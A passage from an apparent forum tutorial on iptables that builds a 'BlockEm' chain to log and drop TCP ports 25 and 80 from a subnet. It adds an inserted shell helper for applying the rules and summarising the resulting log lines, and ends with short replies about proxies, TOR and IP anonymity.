iptables -A BlockEm -p tcp --dport 25 -j DROP

We have the chain ready. It will block the tcp ports 25 and 80. Now let's use it. Suppose we want to block these ports from the ip range 192.168.2.1 - 192.168.2.254, our network range. We should issue this command:

iptables -A INPUT -s 192.168.2.0/24 -j BlockEm

Every input packet from network subnet 192.168.2.0/24 will be directed to the BlockEm chain. Now how about if we LOG the packets and then DROP them? Good idea. We just modify the BlockEm chain with two rules:

iptables -A BlockEm -p tcp --dport 80 -j LOG
iptables -A BlockEm -p tcp --dport 80 -j DROP
iptables -A BlockEm -p tcp --dport 25 -j LOG
iptables -A BlockEm -p tcp --dport 25 -j DROP

And finally:

iptables -A INPUT -s 192.168.2.0/24 -j BlockEm

Now all connection requests from the 192.168.2.0 subnet on ports 80, 25 will be dropped and logged. Now if someone connects, in the /var/log/messages file I will see:

Aug 29 01:04:28 HackFreak-Pc kernel: IN=lo OUT= MAC=00:00:00:00:00:00:00:00:00:00:00:00:08:00 SRC=192.168.2.29 DST=192.168.2.29 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=3663 DF PROTO=TCP SPT=40606 DPT=25 WINDOW=32792 RES=0x00 SYN URGP=0

Well that is the basic idea of iptables.
Hope you learned something from this tut...
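A small shell helper, added here and not part of the post above, that builds the post's BlockEm chain so it can be re-run without duplicating rules (iptables -C checks whether a rule already exists, which the plain -A commands above do not) and reduces the kernel LOG lines the chain writes to source/port pairs. The "BlockEm: " log prefix and the DRY_RUN switch are assumptions added here.

```shell
#!/bin/sh
# Added example, not code from the post: build the BlockEm chain safely
# and summarise the LOG lines it writes. Assumptions made here: the
# "BlockEm: " log prefix and the DRY_RUN switch (1 = only print commands).

# Run iptables, or only print the command when DRY_RUN=1 (no root needed).
ipt() {
    if [ "${DRY_RUN:-0}" = 1 ]; then printf 'iptables %s\n' "$*"; else iptables "$@"; fi
}

# Append a rule only if it is not already present (-C checks for it),
# so running the script twice does not duplicate the LOG/DROP pairs.
add_rule() {
    chain="$1"; shift
    if [ "${DRY_RUN:-0}" = 1 ] || ! iptables -C "$chain" "$@" 2>/dev/null; then
        ipt -A "$chain" "$@"
    fi
}

# build_blockem <subnet> <port>...: LOG then DROP each tcp port, then
# send the subnet's INPUT traffic through the chain, as in the post.
build_blockem() {
    subnet="$1"; shift
    ipt -N BlockEm 2>/dev/null || true        # ignore "chain already exists"
    for port in "$@"; do
        add_rule BlockEm -p tcp --dport "$port" -j LOG --log-prefix "BlockEm: "
        add_rule BlockEm -p tcp --dport "$port" -j DROP
    done
    add_rule INPUT -s "$subnet" -j BlockEm
}

# Reduce one kernel LOG line to "SRC -> DPT/PROTO"; prints nothing for
# lines that carry no SRC/DPT pair (ordinary kernel messages).
summarise_log_line() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= NF; i++) {
            split($i, kv, "=")
            if (kv[1] == "SRC")   src = kv[2]
            if (kv[1] == "DPT")   dpt = kv[2]
            if (kv[1] == "PROTO") proto = kv[2]
        }
        if (src != "" && dpt != "") printf "%s -> %s/%s\n", src, dpt, proto
    }'
}

# Constructed sample: the log line from the post, with the prefix assumed above.
SAMPLE_LOG='Aug 29 01:04:28 HackFreak-Pc kernel: BlockEm: IN=lo OUT= MAC=00:00:00:00:00:00:00:00:00:00:00:00:08:00 SRC=192.168.2.29 DST=192.168.2.29 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=3663 DF PROTO=TCP SPT=40606 DPT=25 WINDOW=32792 RES=0x00 SYN URGP=0'

DRY_RUN="${DRY_RUN:-1}"            # default to preview; set DRY_RUN=0 to apply for real
build_blockem 192.168.2.0/24 80 25
summarise_log_line "$SAMPLE_LOG"   # 192.168.2.29 -> 25/TCP
```

Run as root with DRY_RUN=0 to apply the rules; piping /var/log/messages through summarise_log_line line by line gives a quick view of which hosts are hitting the blocked ports.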
  14. HackFreak

    Hello Big Brother!

    Very nice guide pr0n. I would like to add *although it is self-evident* that on whatever website we visit, most of the time our real IP address is recorded. That is why there are the proxy servers everyone knows about, which offer a degree of anonymity, as well as TOR. Of course, using proxy servers and TOR there is never 100% anonymity, we just don't go in with a "naked" IP. Also, regarding irc, if the irc server uses ssl then the IP address is not shown to the others.
  15. HackFreak

    Cost of War...

    Yes, I agree, but not all people are considered!